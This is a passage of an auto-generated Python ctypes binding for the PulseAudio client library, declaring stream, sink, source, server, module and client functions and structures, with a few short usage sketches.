pa_cvolume_dec.argtypes = [POINTER(pa_cvolume), pa_volume_t]
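# Editor's sketch (not part of the generated wrapper): pa_volume_t is a
# linear integer scale on which 0x10000 is PA_VOLUME_NORM (100%) in the C
# headers. Setting a uniform stereo volume:
#
#     vol = pa_cvolume()
#     pa_cvolume_set(byref(vol), 2, 0x10000)  # two channels at 100%
#     pa_cvolume_valid(byref(vol))            # nonzero on success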
class struct_pa_stream(Structure):
    __slots__ = [
    ]
struct_pa_stream._fields_ = [
    ('_opaque_struct', c_int)
]

class struct_pa_stream(Structure):
    __slots__ = [
    ]
struct_pa_stream._fields_ = [
    ('_opaque_struct', c_int)
]
pa_stream = struct_pa_stream # /usr/include/pulse/stream.h:335
pa_stream_success_cb_t = CFUNCTYPE(None, POINTER(pa_stream), c_int, POINTER(None)) # /usr/include/pulse/stream.h:338
pa_stream_request_cb_t = CFUNCTYPE(None, POINTER(pa_stream), c_size_t, POINTER(None)) # /usr/include/pulse/stream.h:341
pa_stream_notify_cb_t = CFUNCTYPE(None, POINTER(pa_stream), POINTER(None)) # /usr/include/pulse/stream.h:344
pa_stream_event_cb_t = CFUNCTYPE(None, POINTER(pa_stream), c_char_p, POINTER(pa_proplist), POINTER(None)) # /usr/include/pulse/stream.h:352
# /usr/include/pulse/stream.h:357
pa_stream_new = _lib.pa_stream_new
pa_stream_new.restype = POINTER(pa_stream)
pa_stream_new.argtypes = [POINTER(pa_context), c_char_p, POINTER(pa_sample_spec), POINTER(pa_channel_map)]
# /usr/include/pulse/stream.h:366
pa_stream_new_with_proplist = _lib.pa_stream_new_with_proplist
pa_stream_new_with_proplist.restype = POINTER(pa_stream)
pa_stream_new_with_proplist.argtypes = [POINTER(pa_context), c_char_p, POINTER(pa_sample_spec), POINTER(pa_channel_map), POINTER(pa_proplist)]
class struct_pa_format_info(Structure):
    __slots__ = [
        'encoding',
        'plist',
    ]
enum_pa_encoding = c_int
PA_ENCODING_ANY = 0
PA_ENCODING_PCM = 1
PA_ENCODING_AC3_IEC61937 = 2
PA_ENCODING_EAC3_IEC61937 = 3
PA_ENCODING_MPEG_IEC61937 = 4
PA_ENCODING_DTS_IEC61937 = 5
PA_ENCODING_MPEG2_AAC_IEC61937 = 6
PA_ENCODING_MAX = 7
PA_ENCODING_INVALID = -1
pa_encoding_t = enum_pa_encoding # /usr/include/pulse/format.h:64
struct_pa_format_info._fields_ = [
    ('encoding', pa_encoding_t),
    ('plist', POINTER(pa_proplist)),
]
pa_format_info = struct_pa_format_info # /usr/include/pulse/format.h:91
# /usr/include/pulse/stream.h:377
pa_stream_new_extended = _lib.pa_stream_new_extended
pa_stream_new_extended.restype = POINTER(pa_stream)
pa_stream_new_extended.argtypes = [POINTER(pa_context), c_char_p, POINTER(POINTER(pa_format_info)), c_uint, POINTER(pa_proplist)]
# /usr/include/pulse/stream.h:385
pa_stream_unref = _lib.pa_stream_unref
pa_stream_unref.restype = None
pa_stream_unref.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:388
pa_stream_ref = _lib.pa_stream_ref
pa_stream_ref.restype = POINTER(pa_stream)
pa_stream_ref.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:391
pa_stream_get_state = _lib.pa_stream_get_state
pa_stream_get_state.restype = pa_stream_state_t
pa_stream_get_state.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:394
pa_stream_get_context = _lib.pa_stream_get_context
pa_stream_get_context.restype = POINTER(pa_context)
pa_stream_get_context.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:400
pa_stream_get_index = _lib.pa_stream_get_index
pa_stream_get_index.restype = c_uint32
pa_stream_get_index.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:411
pa_stream_get_device_index = _lib.pa_stream_get_device_index
pa_stream_get_device_index.restype = c_uint32
pa_stream_get_device_index.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:422
pa_stream_get_device_name = _lib.pa_stream_get_device_name
pa_stream_get_device_name.restype = c_char_p
pa_stream_get_device_name.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:428
pa_stream_is_suspended = _lib.pa_stream_is_suspended
pa_stream_is_suspended.restype = c_int
pa_stream_is_suspended.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:432
pa_stream_is_corked = _lib.pa_stream_is_corked
pa_stream_is_corked.restype = c_int
pa_stream_is_corked.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:458
pa_stream_connect_playback = _lib.pa_stream_connect_playback
pa_stream_connect_playback.restype = c_int
pa_stream_connect_playback.argtypes = [POINTER(pa_stream), c_char_p, POINTER(pa_buffer_attr), pa_stream_flags_t, POINTER(pa_cvolume), POINTER(pa_stream)]
# /usr/include/pulse/stream.h:467
pa_stream_connect_record = _lib.pa_stream_connect_record
pa_stream_connect_record.restype = c_int
pa_stream_connect_record.argtypes = [POINTER(pa_stream), c_char_p, POINTER(pa_buffer_attr), pa_stream_flags_t]
# /usr/include/pulse/stream.h:474
pa_stream_disconnect = _lib.pa_stream_disconnect
pa_stream_disconnect.restype = c_int
pa_stream_disconnect.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:508
pa_stream_begin_write = _lib.pa_stream_begin_write
pa_stream_begin_write.restype = c_int
pa_stream_begin_write.argtypes = [POINTER(pa_stream), POINTER(POINTER(None)), POINTER(c_size_t)]
# /usr/include/pulse/stream.h:522
pa_stream_cancel_write = _lib.pa_stream_cancel_write
pa_stream_cancel_write.restype = c_int
pa_stream_cancel_write.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:547
pa_stream_write = _lib.pa_stream_write
pa_stream_write.restype = c_int
pa_stream_write.argtypes = [POINTER(pa_stream), POINTER(None), c_size_t, pa_free_cb_t, c_int64, pa_seek_mode_t]
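# Editor's sketch (not part of the generated wrapper): once a playback
# stream reaches PA_STREAM_READY, raw PCM bytes matching the sample spec can
# be pushed with pa_stream_write (`buf` is assumed to be a bytes object):
#
#     pa_stream_write(stream, buf, len(buf), None, 0, PA_SEEK_RELATIVE)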
# /usr/include/pulse/stream.h:557
#pa_stream_write_ext_free = _lib.pa_stream_write_ext_free
#pa_stream_write_ext_free.restype = c_int
#pa_stream_write_ext_free.argtypes = [POINTER(pa_stream), POINTER(None), c_size_t, pa_free_cb_t, POINTER(None), c_int64, pa_seek_mode_t]
# /usr/include/pulse/stream.h:582
pa_stream_peek = _lib.pa_stream_peek
pa_stream_peek.restype = c_int
pa_stream_peek.argtypes = [POINTER(pa_stream), POINTER(POINTER(None)), POINTER(c_size_t)]
# /usr/include/pulse/stream.h:589
pa_stream_drop = _lib.pa_stream_drop
pa_stream_drop.restype = c_int
pa_stream_drop.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:592
pa_stream_writable_size = _lib.pa_stream_writable_size
pa_stream_writable_size.restype = c_size_t
pa_stream_writable_size.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:595
pa_stream_readable_size = _lib.pa_stream_readable_size
pa_stream_readable_size.restype = c_size_t
pa_stream_readable_size.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:601
pa_stream_drain = _lib.pa_stream_drain
pa_stream_drain.restype = POINTER(pa_operation)
pa_stream_drain.argtypes = [POINTER(pa_stream), pa_stream_success_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:607
pa_stream_update_timing_info = _lib.pa_stream_update_timing_info
pa_stream_update_timing_info.restype = POINTER(pa_operation)
pa_stream_update_timing_info.argtypes = [POINTER(pa_stream), pa_stream_success_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:610
pa_stream_set_state_callback = _lib.pa_stream_set_state_callback
pa_stream_set_state_callback.restype = None
pa_stream_set_state_callback.argtypes = [POINTER(pa_stream), pa_stream_notify_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:614
pa_stream_set_write_callback = _lib.pa_stream_set_write_callback
pa_stream_set_write_callback.restype = None
pa_stream_set_write_callback.argtypes = [POINTER(pa_stream), pa_stream_request_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:617
pa_stream_set_read_callback = _lib.pa_stream_set_read_callback
pa_stream_set_read_callback.restype = None
pa_stream_set_read_callback.argtypes = [POINTER(pa_stream), pa_stream_request_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:620
pa_stream_set_overflow_callback = _lib.pa_stream_set_overflow_callback
pa_stream_set_overflow_callback.restype = None
pa_stream_set_overflow_callback.argtypes = [POINTER(pa_stream), pa_stream_notify_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:626
pa_stream_get_underflow_index = _lib.pa_stream_get_underflow_index
pa_stream_get_underflow_index.restype = c_int64
pa_stream_get_underflow_index.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:629
pa_stream_set_underflow_callback = _lib.pa_stream_set_underflow_callback
pa_stream_set_underflow_callback.restype = None
pa_stream_set_underflow_callback.argtypes = [POINTER(pa_stream), pa_stream_notify_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:636
pa_stream_set_started_callback = _lib.pa_stream_set_started_callback
pa_stream_set_started_callback.restype = None
pa_stream_set_started_callback.argtypes = [POINTER(pa_stream), pa_stream_notify_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:641
pa_stream_set_latency_update_callback = _lib.pa_stream_set_latency_update_callback
pa_stream_set_latency_update_callback.restype = None
pa_stream_set_latency_update_callback.argtypes = [POINTER(pa_stream), pa_stream_notify_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:648
pa_stream_set_moved_callback = _lib.pa_stream_set_moved_callback
pa_stream_set_moved_callback.restype = None
pa_stream_set_moved_callback.argtypes = [POINTER(pa_stream), pa_stream_notify_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:658
pa_stream_set_suspended_callback = _lib.pa_stream_set_suspended_callback
pa_stream_set_suspended_callback.restype = None
pa_stream_set_suspended_callback.argtypes = [POINTER(pa_stream), pa_stream_notify_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:662
pa_stream_set_event_callback = _lib.pa_stream_set_event_callback
pa_stream_set_event_callback.restype = None
pa_stream_set_event_callback.argtypes = [POINTER(pa_stream), pa_stream_event_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:669
pa_stream_set_buffer_attr_callback = _lib.pa_stream_set_buffer_attr_callback
pa_stream_set_buffer_attr_callback.restype = None
pa_stream_set_buffer_attr_callback.argtypes = [POINTER(pa_stream), pa_stream_notify_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:681
pa_stream_cork = _lib.pa_stream_cork
pa_stream_cork.restype = POINTER(pa_operation)
pa_stream_cork.argtypes = [POINTER(pa_stream), c_int, pa_stream_success_cb_t, POINTER(None)]
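# Illustrative sketch: pausing/resuming playback. Operations returned by
# libpulse are reference counted and must be unreferenced by the caller.
def _example_set_corked(stream, corked):
    op = pa_stream_cork(stream, 1 if corked else 0, None, None)
    if op:
        pa_operation_unref(op)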
# /usr/include/pulse/stream.h:686
pa_stream_flush = _lib.pa_stream_flush
pa_stream_flush.restype = POINTER(pa_operation)
pa_stream_flush.argtypes = [POINTER(pa_stream), pa_stream_success_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:690
pa_stream_prebuf = _lib.pa_stream_prebuf
pa_stream_prebuf.restype = POINTER(pa_operation)
pa_stream_prebuf.argtypes = [POINTER(pa_stream), pa_stream_success_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:695
pa_stream_trigger = _lib.pa_stream_trigger
pa_stream_trigger.restype = POINTER(pa_operation)
pa_stream_trigger.argtypes = [POINTER(pa_stream), pa_stream_success_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:698
pa_stream_set_name = _lib.pa_stream_set_name
pa_stream_set_name.restype = POINTER(pa_operation)
pa_stream_set_name.argtypes = [POINTER(pa_stream), c_char_p, pa_stream_success_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:731
pa_stream_get_time = _lib.pa_stream_get_time
pa_stream_get_time.restype = c_int
pa_stream_get_time.argtypes = [POINTER(pa_stream), POINTER(pa_usec_t)]
# /usr/include/pulse/stream.h:745
pa_stream_get_latency = _lib.pa_stream_get_latency
pa_stream_get_latency.restype = c_int
pa_stream_get_latency.argtypes = [POINTER(pa_stream), POINTER(pa_usec_t), POINTER(c_int)]
# /usr/include/pulse/stream.h:761
pa_stream_get_timing_info = _lib.pa_stream_get_timing_info
pa_stream_get_timing_info.restype = POINTER(pa_timing_info)
pa_stream_get_timing_info.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:764
pa_stream_get_sample_spec = _lib.pa_stream_get_sample_spec
pa_stream_get_sample_spec.restype = POINTER(pa_sample_spec)
pa_stream_get_sample_spec.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:767
pa_stream_get_channel_map = _lib.pa_stream_get_channel_map
pa_stream_get_channel_map.restype = POINTER(pa_channel_map)
pa_stream_get_channel_map.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:770
pa_stream_get_format_info = _lib.pa_stream_get_format_info
pa_stream_get_format_info.restype = POINTER(pa_format_info)
pa_stream_get_format_info.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:780
pa_stream_get_buffer_attr = _lib.pa_stream_get_buffer_attr
pa_stream_get_buffer_attr.restype = POINTER(pa_buffer_attr)
pa_stream_get_buffer_attr.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:790
pa_stream_set_buffer_attr = _lib.pa_stream_set_buffer_attr
pa_stream_set_buffer_attr.restype = POINTER(pa_operation)
pa_stream_set_buffer_attr.argtypes = [POINTER(pa_stream), POINTER(pa_buffer_attr), pa_stream_success_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:797
pa_stream_update_sample_rate = _lib.pa_stream_update_sample_rate
pa_stream_update_sample_rate.restype = POINTER(pa_operation)
pa_stream_update_sample_rate.argtypes = [POINTER(pa_stream), c_uint32, pa_stream_success_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:805
pa_stream_proplist_update = _lib.pa_stream_proplist_update
pa_stream_proplist_update.restype = POINTER(pa_operation)
pa_stream_proplist_update.argtypes = [POINTER(pa_stream), pa_update_mode_t, POINTER(pa_proplist), pa_stream_success_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:809
pa_stream_proplist_remove = _lib.pa_stream_proplist_remove
pa_stream_proplist_remove.restype = POINTER(pa_operation)
pa_stream_proplist_remove.argtypes = [POINTER(pa_stream), POINTER(c_char_p), pa_stream_success_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:815
pa_stream_set_monitor_stream = _lib.pa_stream_set_monitor_stream
pa_stream_set_monitor_stream.restype = c_int
pa_stream_set_monitor_stream.argtypes = [POINTER(pa_stream), c_uint32]
# /usr/include/pulse/stream.h:820
pa_stream_get_monitor_stream = _lib.pa_stream_get_monitor_stream
pa_stream_get_monitor_stream.restype = c_uint32
pa_stream_get_monitor_stream.argtypes = [POINTER(pa_stream)]
class struct_pa_sink_port_info(Structure):
__slots__ = [
'name',
'description',
'priority',
'available',
]
struct_pa_sink_port_info._fields_ = [
('name', c_char_p),
('description', c_char_p),
('priority', c_uint32),
('available', c_int),
]
pa_sink_port_info = struct_pa_sink_port_info # /usr/include/pulse/introspect.h:232
class struct_pa_sink_info(Structure):
__slots__ = [
'name',
'index',
'description',
'sample_spec',
'channel_map',
'owner_module',
'volume',
'mute',
'monitor_source',
'monitor_source_name',
'latency',
'driver',
'flags',
'proplist',
'configured_latency',
'base_volume',
'state',
'n_volume_steps',
'card',
'n_ports',
'ports',
'active_port',
'n_formats',
'formats',
]
struct_pa_sink_info._fields_ = [
('name', c_char_p),
('index', c_uint32),
('description', c_char_p),
('sample_spec', pa_sample_spec),
('channel_map', pa_channel_map),
('owner_module', c_uint32),
('volume', pa_cvolume),
('mute', c_int),
('monitor_source', c_uint32),
('monitor_source_name', c_char_p),
('latency', pa_usec_t),
('driver', c_char_p),
('flags', pa_sink_flags_t),
('proplist', POINTER(pa_proplist)),
('configured_latency', pa_usec_t),
('base_volume', pa_volume_t),
('state', pa_sink_state_t),
('n_volume_steps', c_uint32),
('card', c_uint32),
('n_ports', c_uint32),
('ports', POINTER(POINTER(pa_sink_port_info))),
('active_port', POINTER(pa_sink_port_info)),
('n_formats', c_uint8),
('formats', POINTER(POINTER(pa_format_info))),
]
pa_sink_info = struct_pa_sink_info # /usr/include/pulse/introspect.h:262
pa_sink_info_cb_t = CFUNCTYPE(None, POINTER(pa_context), POINTER(pa_sink_info), c_int, POINTER(None)) # /usr/include/pulse/introspect.h:265
# /usr/include/pulse/introspect.h:268
pa_context_get_sink_info_by_name = _lib.pa_context_get_sink_info_by_name
pa_context_get_sink_info_by_name.restype = POINTER(pa_operation)
pa_context_get_sink_info_by_name.argtypes = [POINTER(pa_context), c_char_p, pa_sink_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:271
pa_context_get_sink_info_by_index = _lib.pa_context_get_sink_info_by_index
pa_context_get_sink_info_by_index.restype = POINTER(pa_operation)
pa_context_get_sink_info_by_index.argtypes = [POINTER(pa_context), c_uint32, pa_sink_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:274
pa_context_get_sink_info_list = _lib.pa_context_get_sink_info_list
pa_context_get_sink_info_list.restype = POINTER(pa_operation)
pa_context_get_sink_info_list.argtypes = [POINTER(pa_context), pa_sink_info_cb_t, POINTER(None)]
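# Illustrative sketch: enumerating sinks. The callback fires once per sink
# and one final time with eol != 0. Keep the CFUNCTYPE wrapper referenced
# for as long as libpulse may invoke it, or ctypes will free it.
def _example_list_sinks(context):
    def _on_sink(ctx, info, eol, userdata):
        if not eol:
            print(info.contents.index, info.contents.name)
    cb = pa_sink_info_cb_t(_on_sink)
    op = pa_context_get_sink_info_list(context, cb, None)
    return op, cb    # caller unrefs op once eol has been seen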
# /usr/include/pulse/introspect.h:277
pa_context_set_sink_volume_by_index = _lib.pa_context_set_sink_volume_by_index
pa_context_set_sink_volume_by_index.restype = POINTER(pa_operation)
pa_context_set_sink_volume_by_index.argtypes = [POINTER(pa_context), c_uint32, POINTER(pa_cvolume), pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:280
pa_context_set_sink_volume_by_name = _lib.pa_context_set_sink_volume_by_name
pa_context_set_sink_volume_by_name.restype = POINTER(pa_operation)
pa_context_set_sink_volume_by_name.argtypes = [POINTER(pa_context), c_char_p, POINTER(pa_cvolume), pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:283
pa_context_set_sink_mute_by_index = _lib.pa_context_set_sink_mute_by_index
pa_context_set_sink_mute_by_index.restype = POINTER(pa_operation)
pa_context_set_sink_mute_by_index.argtypes = [POINTER(pa_context), c_uint32, c_int, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:286
pa_context_set_sink_mute_by_name = _lib.pa_context_set_sink_mute_by_name
pa_context_set_sink_mute_by_name.restype = POINTER(pa_operation)
pa_context_set_sink_mute_by_name.argtypes = [POINTER(pa_context), c_char_p, c_int, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:289
pa_context_suspend_sink_by_name = _lib.pa_context_suspend_sink_by_name
pa_context_suspend_sink_by_name.restype = POINTER(pa_operation)
pa_context_suspend_sink_by_name.argtypes = [POINTER(pa_context), c_char_p, c_int, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:292
pa_context_suspend_sink_by_index = _lib.pa_context_suspend_sink_by_index
pa_context_suspend_sink_by_index.restype = POINTER(pa_operation)
pa_context_suspend_sink_by_index.argtypes = [POINTER(pa_context), c_uint32, c_int, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:295
pa_context_set_sink_port_by_index = _lib.pa_context_set_sink_port_by_index
pa_context_set_sink_port_by_index.restype = POINTER(pa_operation)
pa_context_set_sink_port_by_index.argtypes = [POINTER(pa_context), c_uint32, c_char_p, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:298
pa_context_set_sink_port_by_name = _lib.pa_context_set_sink_port_by_name
pa_context_set_sink_port_by_name.restype = POINTER(pa_operation)
pa_context_set_sink_port_by_name.argtypes = [POINTER(pa_context), c_char_p, c_char_p, pa_context_success_cb_t, POINTER(None)]
class struct_pa_source_port_info(Structure):
__slots__ = [
'name',
'description',
'priority',
'available',
]
struct_pa_source_port_info._fields_ = [
('name', c_char_p),
('description', c_char_p),
('priority', c_uint32),
('available', c_int),
]
pa_source_port_info = struct_pa_source_port_info # /usr/include/pulse/introspect.h:312
class struct_pa_source_info(Structure):
__slots__ = [
'name',
'index',
'description',
'sample_spec',
'channel_map',
'owner_module',
'volume',
'mute',
'monitor_of_sink',
'monitor_of_sink_name',
'latency',
'driver',
'flags',
'proplist',
'configured_latency',
'base_volume',
'state',
'n_volume_steps',
'card',
'n_ports',
'ports',
'active_port',
'n_formats',
'formats',
]
struct_pa_source_info._fields_ = [
('name', c_char_p),
('index', c_uint32),
('description', c_char_p),
('sample_spec', pa_sample_spec),
('channel_map', pa_channel_map),
('owner_module', c_uint32),
('volume', pa_cvolume),
('mute', c_int),
('monitor_of_sink', c_uint32),
('monitor_of_sink_name', c_char_p),
('latency', pa_usec_t),
('driver', c_char_p),
('flags', pa_source_flags_t),
('proplist', POINTER(pa_proplist)),
('configured_latency', pa_usec_t),
('base_volume', pa_volume_t),
('state', pa_source_state_t),
('n_volume_steps', c_uint32),
('card', c_uint32),
('n_ports', c_uint32),
('ports', POINTER(POINTER(pa_source_port_info))),
('active_port', POINTER(pa_source_port_info)),
('n_formats', c_uint8),
('formats', POINTER(POINTER(pa_format_info))),
]
pa_source_info = struct_pa_source_info # /usr/include/pulse/introspect.h:342
pa_source_info_cb_t = CFUNCTYPE(None, POINTER(pa_context), POINTER(pa_source_info), c_int, POINTER(None)) # /usr/include/pulse/introspect.h:345
# /usr/include/pulse/introspect.h:348
pa_context_get_source_info_by_name = _lib.pa_context_get_source_info_by_name
pa_context_get_source_info_by_name.restype = POINTER(pa_operation)
pa_context_get_source_info_by_name.argtypes = [POINTER(pa_context), c_char_p, pa_source_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:351
pa_context_get_source_info_by_index = _lib.pa_context_get_source_info_by_index
pa_context_get_source_info_by_index.restype = POINTER(pa_operation)
pa_context_get_source_info_by_index.argtypes = [POINTER(pa_context), c_uint32, pa_source_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:354
pa_context_get_source_info_list = _lib.pa_context_get_source_info_list
pa_context_get_source_info_list.restype = POINTER(pa_operation)
pa_context_get_source_info_list.argtypes = [POINTER(pa_context), pa_source_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:357
pa_context_set_source_volume_by_index = _lib.pa_context_set_source_volume_by_index
pa_context_set_source_volume_by_index.restype = POINTER(pa_operation)
pa_context_set_source_volume_by_index.argtypes = [POINTER(pa_context), c_uint32, POINTER(pa_cvolume), pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:360
pa_context_set_source_volume_by_name = _lib.pa_context_set_source_volume_by_name
pa_context_set_source_volume_by_name.restype = POINTER(pa_operation)
pa_context_set_source_volume_by_name.argtypes = [POINTER(pa_context), c_char_p, POINTER(pa_cvolume), pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:363
pa_context_set_source_mute_by_index = _lib.pa_context_set_source_mute_by_index
pa_context_set_source_mute_by_index.restype = POINTER(pa_operation)
pa_context_set_source_mute_by_index.argtypes = [POINTER(pa_context), c_uint32, c_int, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:366
pa_context_set_source_mute_by_name = _lib.pa_context_set_source_mute_by_name
pa_context_set_source_mute_by_name.restype = POINTER(pa_operation)
pa_context_set_source_mute_by_name.argtypes = [POINTER(pa_context), c_char_p, c_int, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:369
pa_context_suspend_source_by_name = _lib.pa_context_suspend_source_by_name
pa_context_suspend_source_by_name.restype = POINTER(pa_operation)
pa_context_suspend_source_by_name.argtypes = [POINTER(pa_context), c_char_p, c_int, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:372
pa_context_suspend_source_by_index = _lib.pa_context_suspend_source_by_index
pa_context_suspend_source_by_index.restype = POINTER(pa_operation)
pa_context_suspend_source_by_index.argtypes = [POINTER(pa_context), c_uint32, c_int, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:375
pa_context_set_source_port_by_index = _lib.pa_context_set_source_port_by_index
pa_context_set_source_port_by_index.restype = POINTER(pa_operation)
pa_context_set_source_port_by_index.argtypes = [POINTER(pa_context), c_uint32, c_char_p, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:378
pa_context_set_source_port_by_name = _lib.pa_context_set_source_port_by_name
pa_context_set_source_port_by_name.restype = POINTER(pa_operation)
pa_context_set_source_port_by_name.argtypes = [POINTER(pa_context), c_char_p, c_char_p, pa_context_success_cb_t, POINTER(None)]
class struct_pa_server_info(Structure):
__slots__ = [
'user_name',
'host_name',
'server_version',
'server_name',
'sample_spec',
'default_sink_name',
'default_source_name',
'cookie',
'channel_map',
]
struct_pa_server_info._fields_ = [
('user_name', c_char_p),
('host_name', c_char_p),
('server_version', c_char_p),
('server_name', c_char_p),
('sample_spec', pa_sample_spec),
('default_sink_name', c_char_p),
('default_source_name', c_char_p),
('cookie', c_uint32),
('channel_map', pa_channel_map),
]
pa_server_info = struct_pa_server_info # /usr/include/pulse/introspect.h:397
pa_server_info_cb_t = CFUNCTYPE(None, POINTER(pa_context), POINTER(pa_server_info), POINTER(None)) # /usr/include/pulse/introspect.h:400
# /usr/include/pulse/introspect.h:403
pa_context_get_server_info = _lib.pa_context_get_server_info
pa_context_get_server_info.restype = POINTER(pa_operation)
pa_context_get_server_info.argtypes = [POINTER(pa_context), pa_server_info_cb_t, POINTER(None)]
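# Illustrative sketch: asking the server for its default sink/source names.
def _example_query_defaults(context, on_done):
    def _on_info(ctx, info, userdata):
        on_done(info.contents.default_sink_name,
                info.contents.default_source_name)
    cb = pa_server_info_cb_t(_on_info)
    op = pa_context_get_server_info(context, cb, None)
    return op, cb    # keep cb alive until the callback has fired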
class struct_pa_module_info(Structure):
__slots__ = [
'index',
'name',
'argument',
'n_used',
'auto_unload',
'proplist',
]
struct_pa_module_info._fields_ = [
('index', c_uint32),
('name', c_char_p),
('argument', c_char_p),
('n_used', c_uint32),
('auto_unload', c_int),
('proplist', POINTER(pa_proplist)),
]
pa_module_info = struct_pa_module_info # /usr/include/pulse/introspect.h:421
pa_module_info_cb_t = CFUNCTYPE(None, POINTER(pa_context), POINTER(pa_module_info), c_int, POINTER(None)) # /usr/include/pulse/introspect.h:424
# /usr/include/pulse/introspect.h:427
pa_context_get_module_info = _lib.pa_context_get_module_info
pa_context_get_module_info.restype = POINTER(pa_operation)
pa_context_get_module_info.argtypes = [POINTER(pa_context), c_uint32, pa_module_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:430
pa_context_get_module_info_list = _lib.pa_context_get_module_info_list
pa_context_get_module_info_list.restype = POINTER(pa_operation)
pa_context_get_module_info_list.argtypes = [POINTER(pa_context), pa_module_info_cb_t, POINTER(None)]
pa_context_index_cb_t = CFUNCTYPE(None, POINTER(pa_context), c_uint32, POINTER(None)) # /usr/include/pulse/introspect.h:433
# /usr/include/pulse/introspect.h:436
pa_context_load_module = _lib.pa_context_load_module
pa_context_load_module.restype = POINTER(pa_operation)
pa_context_load_module.argtypes = [POINTER(pa_context), c_char_p, c_char_p, pa_context_index_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:439
pa_context_unload_module = _lib.pa_context_unload_module
pa_context_unload_module.restype = POINTER(pa_operation)
pa_context_unload_module.argtypes = [POINTER(pa_context), c_uint32, pa_context_success_cb_t, POINTER(None)]
class struct_pa_client_info(Structure):
__slots__ = [
'index',
'name',
'owner_module',
'driver',
'proplist',
]
struct_pa_client_info._fields_ = [
('index', c_uint32),
('name', c_char_p),
('owner_module', c_uint32),
('driver', c_char_p),
('proplist', POINTER(pa_proplist)),
]
pa_client_info = struct_pa_client_info # /usr/include/pulse/introspect.h:454
pa_client_info_cb_t = CFUNCTYPE(None, POINTER(pa_context), POINTER(pa_client_info), c_int, POINTER(None)) # /usr/include/pulse/introspect.h:457
# /usr/include/pulse/introspect.h:460
pa_context_get_client_info = _lib.pa_context_get_client_info
pa_context_get_client_info.restype = POINTER(pa_operation)
pa_context_get_client_info.argtypes = [POINTER(pa_context), c_uint32, pa_client_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:463
pa_context_get_client_info_list = _lib.pa_context_get_client_info_list
pa_context_get_client_info_list.restype = POINTER(pa_operation)
pa_context_get_client_info_list.argtypes = [POINTER(pa_context), pa_client_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:466
pa_context_kill_client = _lib.pa_context_kill_client
pa_context_kill_client.restype = POINTER(pa_operation)
pa_context_kill_client.argtypes = [POINTER(pa_context), c_uint32, pa_context_success_cb_t, POINTER(None)]
class struct_pa_card_profile_info(Structure):
__slots__ = [
'name',
'description',
'n_sinks',
'n_sources',
'priority',
]
struct_pa_card_profile_info._fields_ = [
('name', c_char_p),
('description', c_char_p),
('n_sinks', c_uint32),
('n_sources', c_uint32),
('priority', c_uint32),
]
pa_card_profile_info = struct_pa_card_profile_info # /usr/include/pulse/introspect.h:479
class struct_pa_card_profile_info2(Structure):
__slots__ = [
'name',
'description',
'n_sinks',
'n_sources',
'priority',
'available',
]
